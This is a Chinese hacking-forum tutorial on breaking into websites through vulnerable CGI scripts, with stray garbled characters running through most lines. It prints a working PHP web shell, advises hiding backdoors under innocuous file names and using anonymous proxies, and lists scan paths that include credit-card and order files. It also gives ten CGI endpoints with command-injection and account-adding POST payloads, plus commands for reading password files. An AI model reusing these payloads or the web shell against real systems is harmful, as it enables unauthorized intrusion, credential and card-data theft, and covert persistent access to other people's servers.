中国网络渗透测试联盟

标题: CGI 脚本入侵快速上手+脚本使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:54
标题: CGI 脚本入侵快速上手+脚本使用方法
CGI 脚本入侵快速上手+脚本使用方法% |3 y9 \2 ~2 F) ?0 y. c( _
大家好 我是bboyhip  只是一名菜菜的exploiter
. d. f, t* l' |很开心来到贵论坛, ]/ V& L) d% \  N- V4 k; D
这里让我感觉 很有技术交流的感觉7 J8 F- N0 x6 I1 z; r
我会长长来玩的
# W- n6 T( u8 x3 b" q4 s  ^" b+ y* {前言:
& g8 @7 J) n% O! F# j以下讲解针对欧美日本网站
  z! S3 g( |2 G# p# Y當我們在做滲透分析的時候 方法有很多
  K8 {- h( }2 V' L% e9 b我门都知道 国外伺服器大多是linux 平台
1 S+ H9 Y3 l8 f- B% W+ g所以有很多网站程序有6成都会使用cgi 脚本来管理
. c- p7 {2 s) A6 E目录为/cgi-bin/+ _9 j, _* @) V5 U7 Q; d
9 O$ }" {: B, R
只是个人在实务上一些经验$ r% a2 B/ T6 {1 d$ K
写的不好 请多多见谅喔
1 H/ u$ N- i! E: o在这里我简单分为几个部份一定要會的
5 t3 ?2 J" Z( X+ C( A- J- T讲解一下8 N* `7 L5 _* N6 c2 x# u/ y! J% z
让没有基础的人很容易上手
! k; z  K$ v9 a! L* D1 ?& a0 X7 D1 }) S$ F& I- H% ]
以下内容跟帖回复才能看到9 Z- t, b( G7 s9 C1 o2 {( T. t
==============================
# C3 s2 m3 R5 C
4 D3 J7 V2 v0 _0 Z第1部份: 何谓Shell?
1 g2 B6 A1 b! U) i' ^Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
, N1 Y2 {: O: Z' h( |% r( N* i; DA shell is the program which reads user input from the command line and executes actions based upon that input.
" M% `# Z. W. A, b3 s6 h3 [; d- [意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
6 B5 ~9 c4 l) x3 \# }, T% w0 z& V# N' t$ B
对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
. E& k9 N) {3 k/ ~% M- u要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
% A- Y/ r/ a$ @7 h所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell., X0 Y; Q9 m5 p! g2 @

# \  E; o+ s9 v- x- a' N/ `7 y' b第2部份: Unix 指令
1 e5 V& p+ H" x( g4 O' }以下是一些常见及重要的指令:
6 D7 v( ?  a& w1 Apwd: 显示当前目录, 即是後门/程式所在的位置8 |, q% \* J" x8 N0 E
如 /home/www/site.com/cgi-bin/( B/ g- c5 w6 d: b
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
- j+ [9 r  |  J3 {ls -al :详细列出档案资料(当前目录)
' b# [( C. H  H; F1 {& ^- hls /: 列出根目录8 G1 w  J" g  K( ]* D* X( |
ls /etc: 列出/etc的资料夹及档案& Z! x) U- m$ e) c9 u7 h% l  m
ls ../ -al: 详细列出上一层的资料夹及档案
' w9 ~$ |4 Q- h3 k& j. Q& Kcat: 显示档案内容" @( y/ z( I7 u$ o1 ?: w
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)( |1 j* O3 S$ g" p3 e4 Q
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容1 M7 p! \% v+ H/ m
who: 显示谁login 至系统
: |  @% y& o3 t! k  ]man: 显示指令用法  ; t: Q2 E3 _% K1 |2 r
man ls: 显示ls这指令的用法  
1 i$ z, @2 E: ~* |* xmkdir 建立目录9 q! T# z% k- |; ?' k0 f0 x
rmdir 删除目录
+ ?0 Z0 h( K! Q  c6 xmv 移动档案
( N4 l' c0 C* |" M) @rm 删除档案
. U* i! d1 \) z% b+ }" M. L- _0 L' @0 \
第3部份: Shell的使用
% s6 ]5 G; g( K, u+ s0 P例如:
! h/ [+ L- }6 ^7 ohttp://site.com/refer.php, G3 W( i; [- P- T% a3 L1 U7 x2 V& D
这是我的後门, 原代码如下:
* I! z! ?% M4 P<Form Action="#" Method="POST"> ' M; c( O9 W/ |( z; S
<Input type="text" name="cmd"> $ Y; d4 J6 T/ n: T3 O  @/ V4 Y
<Input type="Submit">
: m. |; [- t: v- i) G* A# q0 u</Form>
! l" z# I) D4 n<?php 7 \9 N$ P$ Y, ?* A2 `1 V" f' ~/ u
$cmd = $_POST['cmd']; / @. [/ R9 O2 F! a( q% l
$Output = shell_exec($cmd);
8 `$ Z' N; K* Z& Jecho $Output; 0 H% j, n; P; N% r; e' e8 j6 b
?> 6 H/ ^- ?) O$ g; ?* V- J
输入pwd, 可得到绝对路径:" B( ~, n* n% \) `0 c7 h5 ~
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com) o; q' w; I) ^3 D  T
- y. S; z% K, s1 D& S/ i
第4部份: 注意事项
& X* P" W* ^! Q: Q1 L: \- 使用匿名代理, 保障自己. v3 L' P2 D! P1 r& c0 d4 n0 S' o, K
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动: U, C; C  H! N8 r% V' a
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.5 R: J4 e$ a' W, O& B" W' y
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.! \0 d2 P* ^1 F" k" k
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,' ~/ R5 _# a# W6 O* T& }* f1 m
不容易被发现.8 Z2 A6 n% a; a, D8 t- V
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
* M) R4 j/ N# M% H针对网站的渗透分析方法太多了6 E* F+ _) g5 Z
这篇文章的重点是cgi 脚本攻击
3 N- f8 x0 E+ l' Y& }1 b- A所以我用简单的叙述形容
7 D* i3 U' Q- _开始讲解脚本入侵过程:$ H7 [! C- T: K
在这里提供一些方法思路让大家学习一下3 Y! S( ~* X+ Q8 q0 v$ `0 _
& u$ l8 o5 D7 s2 U
1.一开始对一个网站进行cgi漏洞扫描4 Y& R+ g$ G3 t* b
我们需要的东西有
( ^" P: P9 J. C" m8 Z扫洞工具 如:triton..等等
* w& T8 J" Y  PE表! L* r4 f3 w% p4 A

: ^6 ]1 U& z& Y9 g/cgi-bin/add-passwd.cgi 5 K) t' n: n$ E( U
/WebShop/templates/cc.txt
% d: p2 A9 }$ v8 T# Z/Admin_files/order.log
1 }4 `7 L* `; ^: T% h/orders/mountain.cfg
' Q5 t# d6 P+ J$ A% b8 i& g/cgi-sys/cart.pl$ }0 M' F5 o9 [/ H% y, \
/scripts/cart.pl+ f8 ^% s/ S. ^& J! t4 s0 M) f0 @
/htbin/cart.pl! m* K% J  ]& Q( p" C& |4 h2 i
E表来源可以是网路收寻或是自己的0 day
$ B! |9 W; a; i" ?# c5 ~2 N+ c; u1 k! R3 G- {' j# r8 a& Y
2.怎样确认扫到的洞 是真的还假的?
: I5 f3 @  h7 q0 o举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
, S5 m  U+ F3 r0 H一般都是在IE里先看一下的,记住这个返回码哦
+ N2 ?" f. A3 F% n  x. KERROR:This script should be referenced with a METHOD of POST.
# n& _; A0 }( P; u/ P没有返回一定是假的
7 p# T8 ?- X( y3 w1 o; n3.重来来了 很多人都会问我
; ^1 ^4 Z; _5 U0 q; v他扫到很多洞 但是不会使用
* b) B% Y# T9 n1 J/ D因为这些漏洞 使用的语法 称为post
- X! [1 z0 S. [! F我们要找post 的方法很多* d( D' w( @+ G) U' d6 N4 T! E
可以是源代码分析 找出介质* d# C9 I# Q. s$ J
或是用抓包工具 抓他的语法...等等
5 n3 o9 F# r: T" |+ q+ D, ~; ~* P1 [% _# B9 T1 S
以下我提供10个 cgi 洞以及使用方法post
$ @# s9 J9 Q( j+ P让大家可以针对网站去做扫描  4 o8 p3 V6 z4 a& @0 A  J7 ^8 u
/index.cgi
* |  R3 X: C! [' |) ~* i9 c) iwei=ren&gen=command
1 g+ a9 v' E! X, K" K- _) ?9 h/passmaster.cgi4 V9 T1 E# W$ A% Q
Action=Add&Username=Username&Password=Password, A( @! t0 c% t3 F+ N4 X
/accountcreate.cgi
, F- M* |, u$ B0 t& dusername=username&password=password&ref1=|echo;ls|
4 F# a9 m4 B' ?& s* l# H* V) A/form.cgi
1 D# R4 D6 w% W3 n* v) E. n/ Wname=xxxx&email=email&subject=xxxx&response=|echo;ls|2 y) I" \/ c. [! y
/addusr.pl
. b9 q6 v* Z* v4 c! R# J% O/cgi-bin/EuroDebit/addusr.pl
! u+ j* ?$ A9 O3 c4 X. g; ?user=username&pass=Password&confirm=Password
2 e( `+ t8 ]' z$ D9 n# R9 b/ccbill-local.asp
6 Q! i$ w) @7 V0 u6 m" W. M5 r% _post_values=username:password; X6 X1 n. e7 n/ L- O
/count.cgi/ Y: h. L, _+ x8 F
pinfile=|echo;ls -la;exit| 5 q# p- f* M6 L# O3 B% r
/recon.cgi
% R; L. u9 S! b' B0 k9 D' b/recon.cgi?search" \6 i" ]+ z- n) L6 J
searchoption=1&searchfor=|echo;ls -al;exit|2 I+ E3 p- r& x# {
/verotelrum.pl
5 `: j( w2 T7 t$ a3 b" k6 Qvercode=username:password:dseegsow:add:amount<&30>
5 J1 k, L+ f/ Q# q2 H/af.cgi_browser_out=|echo;ls -la;exit;|0 o6 ~% e' ?, e) \, B5 X0 `( s
& n0 t( R3 t% z  a! F$ r. z8 M
今天就讲到这  感谢大家支持
& t* S5 k5 e* c' W* M




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2